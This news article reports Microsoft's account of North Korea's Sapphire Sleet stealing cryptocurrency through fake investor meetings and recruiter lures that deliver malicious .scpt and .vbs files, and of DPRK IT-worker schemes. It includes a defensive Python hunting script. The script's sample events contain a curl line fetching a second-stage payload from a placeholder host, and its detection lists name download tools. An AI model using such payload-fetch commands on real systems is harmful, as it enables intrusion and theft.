The North Korea-linked threat actor known as Sapphire Sleet is estimated to have stolen more than $10 million worth of cryptocurrency as part of social engineering campaigns orchestrated over a six-month period.
These findings come from Microsoft, which said that multiple threat activity clusters with ties to the country have been observed creating fake profiles on LinkedIn, posing as both recruiters and job seekers to generate illicit revenue for the sanction-hit nation.
Sapphire Sleet, which has been active since at least 2020, overlaps with hacking groups tracked as APT38 and BlueNoroff. In November 2023, the tech giant revealed that the threat actor had established infrastructure that impersonated skills assessment portals to carry out its social engineering campaigns.
One of the main methods adopted by the group for over a year is to pose as a venture capitalist, deceptively claiming an interest in a target user’s company in order to set up an online meeting. Targets who fall for the bait and attempt to connect to the meeting are shown error messages that urge them to contact the room administrator or support team for assistance.
Should the victim reach out to the threat actor, they are sent either an AppleScript (.scpt) file or a Visual Basic Script (.vbs) file, depending on their operating system, ostensibly to resolve the supposed connection issue.
Under the hood, the script is used to download malware onto the compromised Mac or Windows machine, ultimately allowing the attackers to obtain credentials and cryptocurrency wallets for subsequent theft.
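The delivery chain described above (a .scpt or .vbs "support" file launched from a user's download location that then fetches a second stage) leaves a recognisable trace in process-creation telemetry. The following is an added hunting example, not Microsoft's detection logic or any code from the campaign: it scans constructed EDR-style process events (the field names `parent`, `parent_args`, `image`, `args`, `host` are assumptions) and flags a script interpreter running a script from a download directory, especially when it spawns a child capable of pulling content from the network.

```python
"""Hunt for script-interpreter delivery chains in process-creation telemetry.

Added example, not the page's or Microsoft's own detection logic. The event schema
(host/parent/parent_args/image/args) and the sample events are constructed for illustration.
"""
from __future__ import annotations

# Script hosts named on the page: AppleScript runs under osascript, .vbs under wscript/cscript.
SCRIPT_HOSTS = {"osascript", "wscript.exe", "cscript.exe"}
# Children commonly used to retrieve a second stage; any of these under a script host is notable.
NETWORK_CAPABLE_CHILDREN = {
    "curl", "wget", "powershell.exe", "pwsh.exe", "certutil.exe", "bitsadmin.exe", "mshta.exe",
}
# Locations where a file handed over during a "support" conversation typically lands.
USER_DROP_DIRS = ("/downloads/", "/desktop/", "/temp/", "/tmp/")
SCRIPT_EXTENSIONS = (".scpt", ".vbs")

# Constructed sample events (not real telemetry); hostnames and domain are placeholders.
SAMPLE_EVENTS = [
    {"host": "mac-01", "parent": "/usr/bin/osascript",
     "parent_args": "/Users/alice/Downloads/fix_meeting.scpt",
     "image": "/usr/bin/curl", "args": "-s https://example.invalid/stage2 -o /tmp/.u"},
    {"host": "win-07", "parent": "C:\\Windows\\System32\\wscript.exe",
     "parent_args": "C:\\Users\\bob\\Downloads\\meeting_support.vbs",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "args": "-NoProfile -WindowStyle Hidden -Command placeholder"},
    {"host": "win-07", "parent": "C:\\Windows\\explorer.exe", "parent_args": "",
     "image": "C:\\Program Files\\Zoom\\bin\\Zoom.exe", "args": ""},
    {"host": "win-09", "parent": "C:\\Windows\\System32\\wscript.exe",
     "parent_args": "C:\\Users\\bob\\Downloads\\notes.vbs",
     "image": "C:\\Windows\\System32\\notepad.exe", "args": ""},
    {"host": "mac-01", "parent": "/usr/bin/osascript",
     "parent_args": "/Library/Scripts/backup.scpt",
     "image": "/bin/cp", "args": "-r /Users/alice/Docs /Volumes/Backup"},
]


def _basename(path: str) -> str:
    """Lower-cased file name, tolerant of Windows and POSIX separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _script_from_user_dir(args: str) -> bool:
    """True if any argument is a .scpt/.vbs path under a user download-style directory."""
    norm = args.lower().replace("\\", "/")
    return any(
        tok.endswith(SCRIPT_EXTENSIONS) and any(d in tok for d in USER_DROP_DIRS)
        for tok in norm.split()
    )


def evaluate_event(ev: dict) -> dict | None:
    """Return a finding for one process-creation event, or None if it is not of interest."""
    parent = _basename(ev.get("parent", ""))
    child = _basename(ev.get("image", ""))
    if parent not in SCRIPT_HOSTS:
        return None
    network_child = child in NETWORK_CAPABLE_CHILDREN
    user_dir = _script_from_user_dir(ev.get("parent_args", ""))
    if network_child and user_dir:
        severity = "high"      # script from a drop dir reaching out: matches the lure chain
    elif network_child or user_dir:
        severity = "medium"    # one indicator only; worth triage, not alone conclusive
    else:
        return None            # e.g. an admin script under /Library/Scripts copying files
    return {
        "host": ev.get("host", "?"), "severity": severity,
        "parent": parent, "child": child,
        "reason": f"{parent} ran a user-dropped script={user_dir}, network-capable child={network_child}",
    }


def hunt(events: list[dict]) -> list[dict]:
    """Evaluate every event and keep only those that produced a finding."""
    return [f for f in (evaluate_event(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The two-indicator scoring keeps legitimate automation (the `/Library/Scripts` backup job) out of the high tier while still surfacing a lone script launched from `Downloads` for review; in a real deployment the interpreter and child lists would be tuned to the environment's EDR field names and allow-listed tooling.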
Sapphire Sleet has been identified masquerading as recruiters for financial firms like Goldman Sachs on LinkedIn to reach out to prospective targets and ask them to complete a skills assessment hosted on a website under their control.
“The threat actor sends the target user a sign-in account and password,” Microsoft said. “In signing in to the website and downloading the code associated with the skills assessment, the target user downloads malware onto their device, allowing the attackers to gain access to the system.”
Redmond has also characterized North Korea’s dispatching of thousands of IT workers abroad as a triple threat that makes money for the regime through “legitimate” work, allows them to abuse their access to get hold of intellectual property, and facilitates data theft in exchange for a ransom.
“Since it’s difficult for a person in North Korea to sign up for things such as a bank account or phone number, the IT workers must utilize facilitators to help them acquire access to platforms where they can apply for remote jobs,” it said. “These facilitators are used by the IT workers for tasks such as creating an account on a freelance job website.”
This includes creating bogus profiles and portfolios on developer platforms like GitHub and LinkedIn to communicate with recruiters and apply for jobs.
In some instances, they have also been found using artificial intelligence (AI) tools like Faceswap to modify photos and documents stolen from victims, or to place them against professional-looking backdrops. These pictures are then used on resumes or profiles, sometimes across several personas, that are submitted with job applications.
“In addition to using AI to assist with creating images used with job applications, North Korean IT workers are experimenting with other AI technologies such as voice-changing software,” Microsoft said.
“The North Korean IT workers appear to be very organized when it comes to tracking payments received. Overall, this group of North Korean IT workers appears to have made at least 370,000 US dollars through their efforts.”